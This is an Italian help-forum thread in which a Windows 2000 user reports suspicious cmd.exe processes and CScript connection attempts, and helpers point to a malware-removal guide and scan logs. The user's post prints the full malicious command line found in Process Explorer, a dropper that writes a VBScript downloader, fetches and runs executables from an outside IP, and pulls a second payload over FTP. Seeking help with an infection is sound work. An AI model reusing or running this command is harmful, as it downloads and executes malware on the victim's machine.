Ciao a tutti!
Sono nuovo da queste parti, anche se spesso ho trovato in questo forum molte soluzioni a problemi che mi sono presentati in passato.

Adesso ho davvero un problema che non riesco a risolvere: apro il TaskManager e trovo tra i processi in esecuzione ben TRE cmd.exe, ho cercato su internet cos'è questo processo e ho letto che si tratta del Prompt di DOS che al momento NON sta girando sul computer. Il problema si è presentato qualche giorno fa, prima era assente. Adesso il PC è davvero più lento...

Ho fatto scansioni con AVG Free ma nulla...

Ora mi sono accorto che Zone Alarm mi avvisa che un certo CScript.exe vuole collegarsi ad internet (io rifiuto sempre), dopo ciò mi appare un nuovo cmd.exe nel TaskManager e sento il classico DING di Windows di quando c'è un errore o qualcosa di simile.

Ho provato a vedere cosa mi dice Process Explorer, guardando le proprietaà di uno dei CMD; ecco alcune righe:

Path:
D:\WINNT\system32\cmd.exe

Command line:
cmd /c echo dim HTTPGET>c:\1.vbs&echo dim Data>>c:\1.vbs&echo dim ExeURL>>c:\1.vbs&echo dim LocalPath>>c:\1.vbs&echo.>>c:\1.vbs&echo ExeURL = "http://5.255.14.217:7783/84785_mssql.exe">>c:\1.vbs&echo LocalPath = "c:\Rtsecar.exe">>c:\1.vbs&echo.>>c:\1.vbs&echo Set HTTPGET = CreateObject("Microsoft" ^& chr(46) ^& "XMLHTTP")>>c:\1.vbs&echo Set Data = CreateObject("ADODB" ^& chr(46) ^& "Stream")>>c:\1.vbs&echo.>>c:\1.vbs&echo HTTPGET.Open "GET", ExeURL, false>>c:\1.vbs&echo HTTPGET.Send>>c:\1.vbs&echo.>>c:\1.vbs&echo Const adTypeBinary = ^1>>c:\1.vbs&echo Const adSaveCreateOverWrite = ^2>>c:\1.vbs&echo.>>c:\1.vbs&echo Data.Type = adTypeBinary>>c:\1.vbs&echo Data.Open>>c:\1.vbs&echo Data.Write HTTPGET.ResponseBody>>c:\1.vbs&echo Data.SaveToFile LocalPath, adSaveCreateOverWrite>>c:\1.vbs&cscript //Nologo /B c:\1.vbs&del c:\1.vbs&start c:\Rtsecar.exe&echo open 5.255.14.217 16290>x&echo get 27031_mssql.exe>>x&echo quit>>x&ftp -n -s:x&27031_mssql.exe&del x&exit

Current directory:
D:\WINNT\system32\


NON ho assolutamente idea di che cosa sia, ma mi preoccupa parecchio, anche perché con il TaskManager quando tento di terminarli mi dice che non posso... con Process Exporer invece sì, ci riesco... Mi sapete aiutare?

Vi ringrazio in anticipo

P.S.: NON ho molte conoscenze in informatica, quindi mi scuso in anticipo se non comprenderò qualcosa... sono più un Elettronico :D

Ciao benvenuto nel pronto soccorso di HU.

Per ripulire completamente il pc segui la guida alla disinfezione per infetti (http://www.hwupgrade.it/forum/showthread.php?t=1599737) ed esegui tutte le scansioni ed il caricamento dei relativi log nelle modalità (http://www.hwupgrade.it/forum/showthread.php?t=1779308) e nell'ordine indicato.

Leggi bene tutto questo post, e arriverai in fondo alla guida in perfetta autonomia
salvo in caso di problemi particolari...


Con la pulizia files inutili, e le scansioni vere e proprie di antispyware (1 e 2) ed antivirus (3 e 4) avrai un pc già ripulito al 90%, le prima 4 scansioni dureranno minimo un'oretta ciascuna, le altre scansioni sono veloci e servono a noi per avere le informazioni necessarie per i restanti interventi.

Ricapitolando, dopo aver disabilitato il ripristino di sistema (http://www.hwupgrade.it/forum/showpost.php?p=24113221&postcount=23), fatto la pulizia dei file inutili con ATFCleaner (http://www.hwupgrade.it/forum/showpost.php?p=24033021&postcount=2), vogliamo necessariamente in ordine e anche se non è stato rilevato nulla:

log di Malwarebytes Anti-Malware (http://www.hwupgrade.it/forum/showpost.php?p=24033097&postcount=9) aggiornato ad oggi
log di A-squared (http://www.hwupgrade.it/forum/showpost.php?p=24033085&postcount=8) scansione deep aggiornato ad oggi
log di Kaspersky Virus Removal Tool (http://www.hwupgrade.it/forum/showpost.php?p=24033078&postcount=7) scaricato oggi oppure di F-Secure OnLine (http://www.hwupgrade.it/forum/showpost.php?p=24033058&postcount=6)
log di Dr.Web CureIT (http://www.hwupgrade.it/forum/showpost.php?p=24033048&postcount=5) scaricato oggi
log di ESET SysInspector (http://www.hwupgrade.it/forum/showpost.php?p=24033155&postcount=12)
log di HiJackThis (http://www.hwupgrade.it/forum/showpost.php?p=24033212&postcount=13)
log di Gmer (http://www.hwupgrade.it/forum/showpost.php?p=24033143&postcount=11)
log di PrevxCSI (http://www.hwupgrade.it/forum/showpost.php?p=24033225&postcount=14)



Se il sistema è molto compromesso, e non dovessi riuscire a seguire la guida, prima prova con il rescue cd di avira (http://www.hwupgrade.it/forum/showthread.php?t=1689812), a fare una pulizia preliminare.
In caso di continui riavvi, schermate blu, ecc.. stacca eventuali hardware nuovi, magari incompatibili e per escludere problemi con quelli già in uso fai un controllo del disco e della RAM (http://www.hwupgrade.it/forum/showpost.php?p=24113158&postcount=22), anche una memoria RAM con qualche giorno di vita può essere la causa di tutti i mali...

Se pensi che l'infezione possa essere partita da chiavette usb, o di avere hard disk esterni infetti, collegali prima del punto1 in modo che vengano ripuliti durante la disinfezione, in questo modo eviti di reinfettarti ancora dopo che hai ripulito il pc.

Nel caso il pc da disinfettare abbia problemi con internet o non ce l'abbia proprio, nelle info dei programmi guarda alla voce Portabilità, in modo da scaricare tutto il necessario da un pc pulito e portare tutto l'occorrente sul pc infetto

Tranne che per eseguire gli aggiornamenti e fare le scansioni che richiedano la connessione ad internet è sempre consigliato rimanere sconnessi e non usare il pc per altre operazioni.
Le scansioni falle in ordine e non contemporaneamente, rischi che i programmi non svolgano a dovere il loro compito, e comunque affaticando maggiormente il sistema non guadagneresti comunque tempo...

Questa (http://www.hwupgrade.it/forum/showthread.php?t=1779308) è una brevissima guida alla pubblicazione dei log, qui (http://www.hwupgrade.it/forum/showpost.php?p=23619723&postcount=5) e qui (http://www.hwupgrade.it/forum/showpost.php?p=24073905&postcount=3) esempi precisi ed ordinati di come vorremmo tu li caricassi.

link utili per il caricamento log ed immagini
caricamento log fileqube.com, (http://fileqube.com/) wikisend.com (http://wikisend.com/), mediafire.com (http://www.mediafire.com/index.php)
caricamento immagini fileqube.com (http://fileqube.com/)

Allora... vedo cosa riesco a fare... nel frattempo ho provato a disabilitare il ripristino di sistema, ma sulla pagina linkata non c'è riferimento al sistema operativo Windows 2000 che ho installato su questo PC.
E poi... cosa sarebbe il "ripristino di sistema"? Disabilitandolo a cosa vado incontro?

Grazie!
Saluti

Allora... vedo cosa riesco a fare... nel frattempo ho provato a disabilitare il ripristino di sistema, ma sulla pagina linkata non c'è riferimento al sistema operativo Windows 2000 che ho installato su questo PC.
E poi... cosa sarebbe il "ripristino di sistema"? Disabilitandolo a cosa vado incontro?

Grazie!
Saluti
http://it.wikipedia.org/wiki/Ripristino_configurazione_di_sistema
se hai win 2000 non sei interessato ;)